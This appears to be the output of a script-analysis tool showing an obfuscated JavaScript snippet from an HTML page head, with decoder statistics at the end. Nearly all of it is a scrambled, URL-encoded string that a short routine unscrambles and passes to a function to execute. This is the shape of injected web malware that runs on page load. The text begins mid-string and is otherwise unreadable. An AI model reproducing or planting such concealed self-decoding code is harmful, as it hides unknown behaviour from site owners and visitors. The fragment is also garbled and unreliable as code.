a/5g225%25m2z23ipnosesash2yic2aPS.vm52rr.diet2tClitinr%25-kki023asc/5Cs9vvC%25%252scp/ieai%252E0%255Ct323ccoki.5lma2i-jrlsCfsvt%25p35:Cgyr%25%25=5%25220v2/9%25ih5esbe-0vD5dv%25i3-he0ne2tc/ECCaa.Jly=-5D3soeodg5/0nryhst%25va2325iltcaoi0gFrhtt22Svi5iat02e9-C0oatcfttf1c/r22pt2q2=ns/r%25%253pbs%25/s5555Gr3am2cs%25z222ogSiae9s5lzRb53p5euEcgzaE536aicC.32j=e2mp=2er522Bl%25aa/t/%25p0Jnni=dperagrbve02n%25emam29=%25i0E2%25:55nA0v%251h2g5bD5cs.ahf5d52N0:uk%25ECji%25lph3s3a=05avs/23%2595/p5522mgsn%2555/N:=%25ti%2555Eh/oClvn%252i35p%25D5lv2330p5a5=5b5Opy0sEi22vxCreCgt%25ne%25cdTtb1cL23Ci%25/d2P%25.fn5vaC2Ce2i2?iENdl%252aipgii=srse2p2crmvv2%252-rE0i2i5.pcv=5EcavK%25ce8de2a-22g0R.5-ddf30%25g22ttt.=n%256sArg%25%25moTs:%25Cn2d25e2f2lal/25r-v2%25agcC/tcs%25.5E%25Z3xbgn%25%2555pvC6Eizgcc%25ei=E5C%25dysn2ihd52cl%250c//nvl2esntey30me-saCe23/22d535o/d5le/5svi/vD%25id0s52vmt5pa5%2532-aEhCP-2l2m/.%25%25%255esszta2aCnp5cdE22p505tn32/2atzag5d5sis2/%25-63cs2/if2ei3=002da0.vccDt0dhBhpcmgl%25sEnd52vr5%25E23vaaECC92d3%252%25l=25//r2%2533d33s3C5VgiEsl05a/h/5%25c%25=hm-i3tE%255a5331h%25va32ta2cnp0ri5%25=riri=Cr=i2aXsrgi2egc5aa3a02lo2/5gh5%2522CE0%25p2tsja.%25-ti2/tsaexaEpVgCeavh%25ea%25%25ct3iely2%25s3e2mam2%2533g52030:ib125%252222%25zts.%25mt52%25%25cvd220cvvC53fni55%25%25%25ll%25zd.3es2-3Dts1mlmh-as%25aiia355e2=%25enoe50spl.t5e2i-:23=pinxn/gsM/2s/a%25gl-t/.:s35=E%25vvngE5i2v52sQdms.2gnC55mtas25tE%25cv:5%2502Ei=nhsr/iib%253s32Etn-C2yc2t5/cd3/0j%25/%25r%25ndcd33Cg.E5zt225mp354vs31%25/d%25ms./0ivvmE=/222drEj5ecij0gti4o0tnsir5g5E%25C/cr%255riJa52tse22svl%25hpil21%25vha3barxE3t-%2525iv/2i2g%259/l2tea25Cv0e=nbbE-get032ev2/E2/pa52o2%25eszadC%25siYmz2vC%25:2psdt%25imsr22n2=d0y3aeaien/C3tini2c5nt=d3rmiz=s/Rii%25v5s2ernE335rpti21ivt%25/c0L0n5z2.2r555%25g23652f%25%25d%253ct.%25aa-3l=5r3lpchd233%25Ev/2P/lag/haE2jcnieeltl5ltz2ac52C%25r2ldE22.%2532s225rcn52CD3522i0vrccpgCe5=l9%2525ed%2553g.cC%25.o%25=5ai/v5C00C:t23sr.aaC%255=EptEv.2ahi9025g2%25/%25b=v%253tCc253ce0%25ir-a=rpmn%25aeE555255/g%2524.i%25/:22svmh=tn%25-%25a%252025cmtbmsh5-dighd5QCn3yv05%25qxn3/:t2X0vEzhEegs/vE%25bb2352cel2c2/mgm-52%25irarC3de0gCiJ%25ade0nate35emmi%25i2ds%25t=i2v%252sS%25ec2veto53f3EC0=e%25les2a32Crniv5Fs3H0sEv332ce-//230nan-icde%25i5alv.%25/5-50i0cC5205a%25=C/v532c2c.vr23/si2ds=053r3%25re2em.55p3%25fai=geci5m1C/r%25c2s3225ma5n3022fv2g2gjDee:0n-t-2av2/h.52tnd%25sC33xE.a2Cg2icelC%25C3.%252=hm%25ev%250tit%25svieDht53gr%25=o%25p3od3iE%25a%25lnlro225e0%253h/rt%25dia%252c2va5h83/o5F-isah.20n=/0.a2Ft2/d5s%25//t--2l2s5%259en550-gCli2b55ece%252l5lxvsve2Ce5cC-0dzrv5V2%25pi5sci:%25s5vE%25s%25%25ey212v025E0s%25d2/Eh5a2t2na/aa3dSl5:%250avrn2pp2E2v52ip%25=35c50jieell5siC2vfvi%25o2agc3s2%25n0aiae/2r522252ie59m=1.dC5w=el.0t2nep3x22e53dEhi2:i%25X55v2i2op%25i3%2533e9/%25n32-ta2bt-r2p38aCs%252ylaeC=simetbo-C3%25tcEmlrh0sllsg%25e.ire7i05nc39Er%25d2a2ib/%25vC2-aaenEri.E%25eC2%25sav%25n//250/aa2295os52s5s3rmv%25vlv5225:052-2cm3tes%25ie5/gz225l020es8:2/dEev%25f23/5ae55ol%25CgCaEtnEd5=i%252D%25sl=%25ip5%2532divs3p/ECr232riva%252C5%25ln/23tn05Ey%25g2325rv%252s%25sEccims%25pt-hvn3%25k5E5etct5%25E3i2de2srEepg2emttpgg5ll2p%25eiaiv3cE5%25%2530nhse0.22%25t-2/3g53v5-tW5%25b/V/b5ir2p05imes2Ss4eE4e.5eEK5a.3%25s0h2n%25s2ysge3e3v3l2ssirnlih322t5e%25i%25saEa%25c2=e55i-ca%250%25e2C3%25pvc05vxC.m%253i0c%252==2v5nciC/g.ge2mv%25s33e5e%25le%25nah/v%25n=cmnt3%25M-2sZ3ctr053n-%25aaa220=2202EaoCxd0%25vhv-po5aaeC==/c/-2opl0e%25ee35d/5%255r552igta=E22nmsE2E-ec5i/tgt/icr25Er2sv/.mcCs%25tcE3e5C22n3/vb02lp2=H52yCpn03%25l2vl%25/cC2e%250./ep03a5/v.Pv32rm/Q2dC155/cEli-n-5e%25eC.ide2:20v5r/ea2risi455mriemStihrbp32n=:llrlbi2c%25h2t2l2.n3%25p%252%255%25t.553ex259aasncQe2v22%25t3a3cs%25sa%25c2523tt23Cv3vEe2meg5e2vvg2YEhsCcsCgdC%25/r0it2l=5:2%25nc2rva10%25t53%2522ma2tst0g%25s%25pl505%255ol/hl%25ip%25l525g22Clio032252oc2%25/ac:iv%25hrlasess2vh55l3Cv-=3%25tin5%25E/ptdcgc5iE3%252tij2)v.%25d5te2t%255k/2%25le-./5/%25l=gds55l5y=vmgl.p205252v5Egr%25l=a.,=&29svi5Ne5l32e2chll2v%25pd(0SC%25eEnh-e3BD5pfC3-5CdiEgrrnbj%25rh%25.ng%25eCgC,%25%25B=D2=vg2e2ihi2%25/5,2plln=o3bl%25,o5nC-nvc5p)+n%25tD%25;tfs52,kBepndenls,Cg5k=C%25i2)5c-g%255iEf)npta%25e-3itc5kD=i+3%25%25E,lhi%25)BvD1)1=5Ci;=5;t=2kv.5r=3t%25hn-s5c%25%25g%25rtj%25il553.Dg20=;55ee2ann.t%25(%255tih2C/E:0=it2;%25(./(5Bte3.h2c=k%25g%25%22st((2(=l.)v5(Ei-C=ehge%25t%22lek)%25lfl,3l(lt-lkcgl))nifB.h21e-11&=,=-tnf3=0g;+t)t)n+-=g%250=r=t+gj)lD.g%5D(el%5B%25=bsCC7k%5D,;)k,r=%3E-=0gb.i3)=%5B3&g;(li,l,.k;0.2n)%5B/ln%3Cen;=f%22&kki1=el,s%7C,l(.(0%5D+g%22p3g%25-%5B)m%5D-%3E5,2=%5D%3C,+er=7htsB,==sl%25i=ll/fl%7Cklfj(hEf%22lps+E7fo,gn%5Bmc%7B);hnl%25frklk.%25%25ngtcolk%5B%3Eih:,kj%5D;2Yi)%7D=l)%25=(c=,t--")).split(""),g=k.length%j.length,l=k.length-1;l>=0;l--)g--,-1==g&&(g=j.length-1),f=l+j[g],f>=k.length||(c=k[l],b=k[f],k[f]=c,k[l]=b);for(n=m,i="",l=0;l<k.length;l++)i+=k[l];n(i)})();

</script>
</central>
    
</head>
</html>

Function Calls

None

Variables

None

Stats

MD5 29443399d93d247a4ee3bf3eac78ad6d
Eval Count 0
Decode Time 109 ms